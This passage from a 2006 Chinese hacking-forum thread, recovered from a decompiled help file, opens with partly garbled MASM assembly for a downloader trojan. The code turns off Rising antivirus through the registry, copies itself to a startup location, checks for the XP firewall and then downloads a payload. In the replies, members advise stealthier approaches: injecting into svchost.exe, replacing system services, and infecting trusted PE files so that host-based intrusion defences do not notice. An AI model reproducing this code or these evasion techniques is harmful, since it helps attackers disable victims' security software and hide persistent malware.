yhKey .endif ret _CreateKey endp 关闭瑞星后设置为启动复制自身到预定目录 _CloseToo proc _lpKey LOCALhKey :DWORD LOCALBufSize:DWORD local hKeydwIndexdwLastTime:FILETIME invoke RegCreateKeyHKEY_LOCAL_MACHINEaddrszRegKeyaddrhKey .if eaxERROR_SUCCESS invoke RegSetValueExhKeyaddrszRfwServiceNULL REG_DWORDaddrszStr14 invoke RegCloseKeyhKey invokeGetModuleFileNamehModuleaddrszDirectory200 invokeCopyFileaddrszDirectoryaddrszWinFALSE call_CreateKey .endif invoke GetStartupInfoaddrstStartUp invoke CreateProcessNULLaddrszShutDownNULLNULLNULL NORMAL_PRIORITY_CLASSNULLNULLaddrstStartUpaddrstProcInfo ret _CloseToo endp 判断本机是否开启XP防火墙 _DWORD proc _lpKey LOCALhKey :DWORD LOCALBufSize:DWORD local hKeydwIndexdwLastTime:FILETIME invokeRegOpenKeyExHKEY_LOCAL_MACHINEaddrszRegKeyXPNULLKEY_QUERY_VALUEaddrhKey .if eaxERROR_SUCCESS invokeRegQueryValueExhKeyaddrszKeyXPNULLNULLszStr1addrBufSize .ifeaxERROR_SUCCESS call_Download .elseif invoke_CloseXPnetWorkNULL .endif .endif _DWORDendp start: invokeGetModuleHandle0 movhInstanceeax call_DWORD invokeExitProcessNULL endstart 这个代码仅仅测试了没有XP防火墙能正常下载运行外其他的有XP防火墙和瑞星防火墙的未曾测试因为没有找到人帮忙如果测试没有通过的朋友可以告诉我我想如果人品没问题的话估计可以通过: 此贴被asm在2006-11-1613:04重新编辑顶部 抗战二十年 发布于:2006-10-2916:48 1楼 作者的命题我初一看以为是S.C.T的下载者小工具中有埋伏以为是S.C.T下载者插了后门什么的呵呵建议作者把命题改一下吧顶部 永恒的沙加 发布于:2006-10-3001:25 2楼 个人意见关防火墙关杀毒软件的方法不可取。
防火墙杀毒软件无缘无故被关掉对方不可能不察觉。
我们要做的不是和一个坐在计算机面前的人真刀真枪的干。
你把人家弄急了最多重装系统。
我们要的是杀人于无形。
对于插入进程再说两句 本人认为插入explorer.exe或者IE.exe并不好 有的防火墙仍然会拦截。
因为这两个程序一般情况并不会自动连接网络。
最好插入svchost.exe.基本还没遇到过不了的防火墙 同时替换掉一个通过加载svchost.exe运行的服务。
这种服务在服务启动里有很多。
顶部 asm 发布于:2006-10-3002:00 3楼 插入svchost.exe这个在研究当中估计先获取函数地址然后用GetWindowThreadProcessId和OpenProcess打开操作然后远程注入.......... 谢谢朋友的提醒....顶部 gyzy 发布于:2006-11-1623:25 4楼 楼主汇编功力不错支持一下思路也不错但主动关闭防火墙总不是太好的办法很容易暴露自己最好还是能完全穿透防火墙特别是现在的主动防御软件比如KIS6.0ZoneAlarm。
一种思路就是寻找它们的疏忽之处智者千虑必有一失嘛况且为了友好某些方面不太可能做的太绝。
另外一种方法就是代码寄生推荐这种方法一般的防火墙几乎不太可能拦住顶部 asm 发布于:2006-11-1710:19 5楼 Quote: 另外一种方法就是代码寄生推荐这种方法一般的防火墙几乎不太可能拦住 代码寄生这个可是新词...是不是类似感染把代码插进程序空隙一样 我有个设想就是如果感染杀毒软件主程序本身行不行得通顶部 ZV 发布于:2006-11-1711:36 6楼 沙迦说的应该就是bingle前几年写的一篇.安焦给ddos了搜索一下应该得到.顶部 remax 发布于:2006-11-1712:42 7楼 发现gyzy最近上bbs勤快多了代码寄生是什么同学解释一下顶部 gyzy 发布于:2006-11-1723:14 8楼 Quote: 引用第6楼asm于2006-11-1710:19发表的: 代码寄生这个可是新词...是不是类似感染把代码插进程序空隙一样 ....... 嗯我在博客中提到过了这种方法就是感染PE文件来实现代码寄生比如感染绝对可信的进程Svchost.exe但是感染PE文件需要特别注意一些细节宿主程序的功能不能被破坏是起码的要求。
不增加文件大小就已经相当隐蔽了这算是病毒和后门融合的一个典型例子这种方法特别适合小型的下载者稍复杂的后门就不大现实了现在的HIPS越来越强我个人觉得这是以后Malware的一个发展趋势据说某流氓软件也开始用PE感染了。
至于楼主所说的感染杀毒软件本身我不太赞成像卡巴KIS对自身的保护就很周全还是感染系统文件比较稳妥顶部 asm 发布于:2006-11-1800:45 9楼 已经成功注入exeplorer.exe http://forum.eviloctal.com/read-htm-tid-26092.html 利用了FindWindow找窗口类 此贴被asm在2006-11-1807:18重新编辑cCopyleft2003-2007EvilOctalSecurityTeam. ThisfileisdecompiledbyanunregisteredversionofChmDecompiler. Regsiteredversiondoesnotshowthismessage. YoucandownloadChmDecompilerat:http://www.zipghost.com/
上一篇:
关于使用部分源程序、控件和/或相关技术文档的保密协议
下一篇:
网上购物系统毕业设计论文